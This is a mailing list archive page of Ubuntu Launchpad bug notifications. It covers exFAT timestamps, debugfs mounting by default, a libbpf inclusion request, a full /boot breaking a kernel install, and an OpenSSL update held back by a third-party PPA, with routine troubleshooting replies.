Status in ubuntu-meta package in Ubuntu:
  Confirmed

Bug description:
  When using exfat formatted drives (e.g. my camera card) with focal
  fossa any access causes the date modified to be set, even when it
  would not normally be set, and it is set a month into the future.

  Installing exfat-fuse and exfat-utils results in the correct
  behaviour.

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: ubuntu-release-upgrader-core 1:20.04.18
  ProcVersionSignature: Ubuntu 5.4.0-21.25-generic 5.4.27
  Uname: Linux 5.4.0-21-generic x86_64
  ApportVersion: 2.20.11-0ubuntu26
  Architecture: amd64
  CasperMD5CheckResult: skip
  CrashDB: ubuntu
  CurrentDesktop: ubuntu:GNOME
  Date: Mon Apr 13 17:27:30 2020
  InstallationDate: Installed on 2020-04-12 (1 days ago)
  InstallationMedia: Ubuntu 20.04 LTS "Focal Fossa" - Beta amd64 (20200409)
  PackageArchitecture: all
  ProcEnviron:
   LANGUAGE=en_GB:en
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_GB.UTF-8
   SHELL=/bin/bash
  SourcePackage: ubuntu-release-upgrader
  Symptom: dist-upgrade
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1872504/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1912855] Re: debugfs shouldn't be mounted by default

2021-01-22 Thread Seth Arnold
I'm inclined to say an admin should ask to mount this explicitly,
however stgraber pointed out on irc that lxd premounts /sys/kernel/debug
in part to placate upstart in guests. This may have implications for
disabling /lib/systemd/system/sys-kernel-debug.mount by default.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1912855

Title:
  debugfs shouldn't be mounted by default

Status in systemd package in Ubuntu:
  New

Bug description:
  On modern Ubuntu systems, /sys/kernel/debug is mounted by default due
  to sys-kernel-debug.mount being enabled by default.

  AFAIK, this FS doesn't need to be mounted for normal operations and
  back in the day, there were concerns about the security implications
  of having it enabled/mounted by default
  (https://lists.ubuntu.com/archives/kernel-
  team/2011-January/013418.html).

  Would it be possible to not have it mounted by default?

  
  $ apt-cache policy systemd
  systemd:
Installed: 245.4-4ubuntu3.4
Candidate: 245.4-4ubuntu3.4
Version table:
   *** 245.4-4ubuntu3.4 500
  500 http://us.archive.ubuntu.com/ubuntu focal-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   245.4-4ubuntu3 500
  500 http://us.archive.ubuntu.com/ubuntu focal/main amd64 Packages
  $ lsb_release -rd
  Description:  Ubuntu 20.04.1 LTS
  Release:  20.04

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1912855/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1910576] Re: [MIR] libbpf (dependency of iproute2)

2021-01-14 Thread Seth Arnold
Thanks Christian, I think you're right, this probably doesn't need a
security review and being centralized in one place will probably be
easier to maintain.

Thanks

** Changed in: libbpf (Ubuntu)
   Status: New => Fix Committed

** Changed in: libbpf (Ubuntu)
 Assignee: Seth Arnold (seth-arnold) => (unassigned)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to iproute2 in Ubuntu.
https://bugs.launchpad.net/bugs/1910576

Title:
  [MIR] libbpf (dependency of iproute2)

Status in iproute2 package in Ubuntu:
  Invalid
Status in libbpf package in Ubuntu:
  Fix Committed

Bug description:
  [Availability]
  libbpf | 0.1.0-1 | groovy/universe  | source
  libbpf | 0.3-2   | hirsute/universe | source

  [Rationale]
  Libbpf is (or is about to become) a dependency for building iproute2 which 
already is in main. Using BPF is becoming more wide-spread. The library allows 
to load and use eBPF programs from user-space (functionality provided by the 
kernel). It is already maintained in main for Debian 
(https://tracker.debian.org/pkg/libbpf)

  [Security]
  Since the code is taken out of the Linux kernel, this should be treated 
similar to the kernel for security. Research uncovered no records about 
security issues.

  [Quality assurance]
  At this point there are no open bug reports against libbpf (except this one) 
in Ubuntu. Also no open bugs found in Debian. Project is taken from the kernel 
source and claims static analysis via LGTM and Coverty. Also has CI via Travis 
(https://travis-ci.com/github/libbpf/libbpf).
  Right now there are no dep-8 tests. Though potentially it should be possible 
to create those, would this really add additional benefit beyond having 
upstream CI?
  A test build on hirsute was showing no warnings beyond lintian complaining 
about things which would be changed if we had delta (unstable as series for 
example). Otherwise was clean.

  [Dependencies]
  libc6: main
  libelf1: main
  zlib1g: main

  [Standards compliance]
  $ lintian --pedantic libbpf_0.3-2.dsc
  P: libbpf source: no-homepage-field
  P: libbpf source: silent-on-rules-requiring-root

  [Maintenance]
  As this is only taking out code from the kernel into a separate library 
package, the maintenance effort should be minimal. Packaging is done in Debian 
and is synced into Ubuntu (no delta).

  [Background information]
  A discourse about why this is packaged outside the kernel can be found at 
https://lwn.net/Articles/836911/.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/iproute2/+bug/1910576/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1911836] Re: package linux-image-5.4.0-62-generic 5.4.0-62.70 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1

2021-01-14 Thread Seth Arnold
Hello, I think the core of your problem is this:

Error 24 : Write error : cannot write compressed block

Caused by a full /boot:

/dev/sda2  483946424596 34365  93% /boot


Truncate a few older files in /boot (start a shell via sudo -s, then find files 
with ls -l, then use `> vmlinux-whatever` to truncate files from an old kernel).

Once you've truncated a kernel and symbols file, you probably have
enough disk space free to run:

sudo apt install -f
sudo apt autoremove

Thanks

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1911836

Title:
  package linux-image-5.4.0-62-generic 5.4.0-62.70 failed to
  install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools
  exited with return code 1

Status in initramfs-tools package in Ubuntu:
  New

Bug description:
  Possibly related to https://bugs.launchpad.net/ubuntu/+bug/1911835

  These just happened during the same update cycle.

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: linux-image-5.4.0-62-generic 5.4.0-62.70
  ProcVersionSignature: Ubuntu 5.4.0-60.67-generic 5.4.78
  Uname: Linux 5.4.0-60-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.14
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Thu Jan 14 21:19:12 2021
  ErrorMessage: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with 
return code 1
  HibernationDevice: RESUME=UUID=b9d6e51c-6ef1-4b05-916a-17aa1a75141c
  InstallationDate: Installed on 2016-07-02 (1657 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 
(20160420.1)
  MachineType: LENOVO 80K9
  ProcFB: 0 i915drmfb
  ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.4.0-60-generic 
root=/dev/mapper/ubuntu--vg-root ro quiet splash vt.handoff=7
  PulseList: Error: command ['pacmd', 'list'] failed with exit code 1: No 
PulseAudio daemon running, or not running as session daemon.
  Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4
  RelatedPackageVersions: grub-pc 2.04-1ubuntu26.7
  SourcePackage: initramfs-tools
  Title: package linux-image-5.4.0-62-generic 5.4.0-62.70 failed to 
install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with 
return code 1
  UpgradeStatus: Upgraded to focal on 2020-12-06 (39 days ago)
  dmi.bios.date: 07/21/2015
  dmi.bios.vendor: Lenovo
  dmi.bios.version: A9CN61WW
  dmi.board.asset.tag: No Asset Tag
  dmi.board.name: Lenovo Edge 15
  dmi.board.vendor: LENOVO
  dmi.board.version: SDK0J40700 WIN
  dmi.chassis.asset.tag: No Asset Tag
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Lenovo Edge 15
  dmi.modalias: 
dmi:bvnLenovo:bvrA9CN61WW:bd07/21/2015:svnLENOVO:pn80K9:pvrLenovoEdge15:rvnLENOVO:rnLenovoEdge15:rvrSDK0J40700WIN:cvnLENOVO:ct10:cvrLenovoEdge15:
  dmi.product.family: IDEAPAD
  dmi.product.name: 80K9
  dmi.product.sku: LENOVO_MT_80K9_BU_idea_FM_Lenovo Edge 15
  dmi.product.version: Lenovo Edge 15
  dmi.sys.vendor: LENOVO

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1911836/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1908733] Re: CVE-2020-1971 OpenSSL package upgrade issue

2020-12-22 Thread Seth Arnold
Hello, you've replaced the Ubuntu OpenSSL packages with Ondrej's OpenSSL
packages. You can ask him if he has performed the corresponding update
yet: https://github.com/oerdnj/deb.sury.org

Thanks

** Information type changed from Private Security to Public Security

** Changed in: openssl (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1908733

Title:
  CVE-2020-1971 OpenSSL package upgrade issue

Status in openssl package in Ubuntu:
  Invalid

Bug description:
  Hello,

  I have tested it on 4 vurtual machines (details below):

  # uname -a
  Linux web2 4.15.0-128-generic #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 
x86_64 x86_64 x86_64 GNU/Linux

  
  # lsb_release -rd
  Description:Ubuntu 18.04.5 LTS
  Release:18.04

  $ apt-cache policy openssl
  openssl:
Installed: 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1
Candidate: 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1
Version table:
   *** 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1 500
  500 http://ppa.launchpad.net/ondrej/apache2/ubuntu bionic/main amd64 
Packages
  100 /var/lib/dpkg/status
   1.1.1g-1+ubuntu18.04.1+deb.sury.org+1 500
  500 http://ppa.launchpad.net/ondrej/php/ubuntu bionic/main amd64 
Packages
   1.1.1-1ubuntu2.1~18.04.7 500
  500 http://il.archive.ubuntu.com/ubuntu bionic-updates/main amd64 
Packages
  500 http://security.ubuntu.com/ubuntu bionic-security/main amd64 
Packages
   1.1.0g-2ubuntu4 500
  500 http://il.archive.ubuntu.com/ubuntu bionic/main amd64 Packages


  My OpenSSL version is: openssl 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1

  I wanted to install patch to fix "CVE-2020-1971" on my virtual
  machines. But found next issue: there is article (
  https://ubuntu.com/security/CVE-2020-1971) with package name
  (version), where "CVE-2020-1971" issues is fixed -->
  "1.1.1-1ubuntu2.1~18.04.7".

  Normal (expected?) behaviour for me (in my case) is to do next:

  sudo apt update
  sudo apt upgrade

  After this all packages in my system should be upgraded to latest
  versions.

  But in fact - OpenSSL package remained same
  1.1.1g-1+ubuntu18.04.1+deb.sury.org+1

  When i check:

  $ apt list openssl
  Listing... Done
  openssl/bionic,now 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1 amd64 [installed]
  N: There are 3 additional versions. Please use the '-a' switch to see them.

  $ apt list openssl -a
  Listing... Done
  openssl/bionic,now 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1 amd64 [installed]
  openssl/bionic 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1 amd64
  openssl/bionic-updates,bionic-security 1.1.1-1ubuntu2.1~18.04.7 amd64
  openssl/bionic 1.1.0g-2ubuntu4 amd64

  Ok, lets install latest package --> 1.1.1-1ubuntu2.1~18.04.7:

  sudo apt install openssl=1.1.1-1ubuntu2.1~18.04.7

  And here i receive next:

  
  Reading package lists... Done
  Building dependency tree
  Reading state information... Done
  The following packages will be DOWNGRADED:
openssl
  0 upgraded, 0 newly installed, 1 downgraded, 0 to remove and 0 not upgraded.
  Need to get 614 kB of archives.
  After this operation, 132 kB disk space will be freed.
  Do you want to continue? [Y/n] yn
  Get:1 http://il.archive.ubuntu.com/ubuntu bionic-updates/main amd64 openssl 
amd6

 4 1.1.1-1ubuntu2.1~18.04.7 [614 kB]
  Fetched 614 kB in 0s (1,367 kB/s)
  dpkg: warning: downgrading openssl from 1.1.1g-1+ubuntu18.04.1+deb.sury.org+1 
to  

1.1.1-1ubuntu2.1~18.04.7

  Is this correct behavior? Why newest version (mentioned in
  https://ubuntu.com/security/CVE-2020-1971) considered as DOWNGRADE?

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1908733/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


  1   2   3   4   5   6   7   8   9   10   >